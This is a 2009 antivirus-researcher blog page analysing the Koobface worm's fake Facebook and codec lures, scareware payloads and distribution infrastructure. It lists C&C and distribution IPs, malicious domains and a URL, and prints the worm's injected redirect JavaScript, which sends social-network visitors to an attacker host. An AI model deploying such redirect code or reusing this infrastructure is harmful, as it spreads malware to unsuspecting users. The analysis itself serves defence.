R3v3rs3e's Blog

Posts Tagged ‘koobface’

Koobface on the Move, Serving Scareware

Posted by Steve Espino on September 18, 2009

The PC Tools Malware Research Centre has been seeing new movement on the koobface front Lately.

koob_fiddle

As koobface-serving domains are being taken down as early as the good guys discover them, the bad guys are at it and they respond by registering new ones. At the moment, their, C&C server is hosted in China with IP Address 61.235.117.83.

The bad guys are still using a fake facebook website, as well as posing as a fake codec, in order to distribute koobface.

fake_facebook

Clicking anywhere on the page, presents us with a file named setup.exe. Here are some of the IPs being used to distribute koobface:

koob_script

115.130.27.204
123.202.200.84
151.204.31.67
196.206.65.53
221.126.0.105
24.215.207.229
41.238.76.198
61.93.34.23
67.206.253.52
68.47.48.240
69.18.107.115
69.254.215.173
70.122.242.250
70.212.232.126
71.116.37.213
71.130.216.179
71.194.236.32
71.80.105.40
72.13.138.210
72.190.87.208
75.181.171.110
75.251.94.44
76.119.98.22
76.22.160.28
76.23.203.64
81.192.192.160
98.140.58.163
98.244.224.140
98.26.40.38
99.22.74.229

The javascript component being by used by koobface, remains bascically the same as before

And as before, koobface is still serving up scareware. From time to time, users are presented with a My Computer online scan, going through these domains:

rogue

gotrioscan(dot)com
plazec(dot)info

At some instances, we also get these warnings:

hardware_error
Internet_Antivirus_Pro

At the moment, these warnings are serving Internet Antivirus Pro.

In order to be protected against these attacks, users of PC Tools Spyware Doctor are advised to use the latest PC Tools update.

An earlier post about koobface can be found here.

Update:
Koobface has been going at it and here’s another one that spoofs youtube and serves koobface malware as a fake codec:

hxxp://71.197.170.226/d=www.marcellaburnard.com/0x3E8/view/console=yes/?go

Posted in Malicious Intent, Rogue Apps | Tagged: , , , , , , , , , , , , , , , , , , , | 4 Comments »

Facebook: Rogue AV Farm?

Posted by Steve Espino on August 10, 2009

There has been enormous movement related to koobface lately and it has been mostly driven by social networking websites such as Facebook, Tagged, Myspace, Twitter, and many others.

One social networking website that probably tops the list of sites used as attack vectors is Facebook.

Here’s a screenshot of a spoofed Facebook website:

koob1

We are presented by a fake codec alert and unsuspecting users usually download and install a malware aptly detected by PC Tools Spyware Doctor as Net-Worm.Koobface.

koob2

We have seen koobface being hosted on kukuruku-290709(dot)com, but thanks to the all good guys out there this site has been taken down. But the bad guys have responded and are now using legitimate domains and redirections to serve koobface. We have seen a small patch of code on websites used in the redirection:

wrttnsvqnayay qrqgtlzac
script src ="4fc . js" // edited
qsmypwqmoj bbaspbrq

The strings are random, and so are the names of the javascript files being executed.

Here’s what the javascript file has to offer:

// KROTEG
var abc1 = 'http://kukuruku-290709.com/go/';
var abc2 = 'http://kukuruku-290709.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['twitter.com', abc+'tw.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
];
var s = '' + document.referrer, r = false;
for (var i = 0; i 0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
location.href = redir;
r = true;
break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;

Since the domain kukuruku-290709(dot)com has been brought down already, we’ll soon most likely see new ones emerge to host koobface.

One of the payloads of koobface is downloading other malware, and currently it is serving Rogue AVs including one that PC Tools Spyware Doctor detects as RogueAntiSpyware.System Security.

We’ve talked about RogueAntiSpyware.System Security in a previous post.

system_security_scan

A few weeks prior to today, there has been a lot of buzz about Facebook’s Farm Town app serving up Rogue AVs. And recently Facebook is once-again associated with Rogue AVs. Clearly, the bad guys behind these attacks are tyring to make quick bucks by promoting scareware. And of course by using techniques such as Social Engineering , malware and scareware spread rather quickly and easily, because attackers can hide behind the names of even the people we trust.

Take extreme care when viewing emails, tweets, comments or posts. Even if they came from people we know.

Posted in Malicious Intent, Rogue Apps | Tagged: , , , , , , , , , , , , , , | 1 Comment »

 
Follow

Get every new post delivered to your Inbox.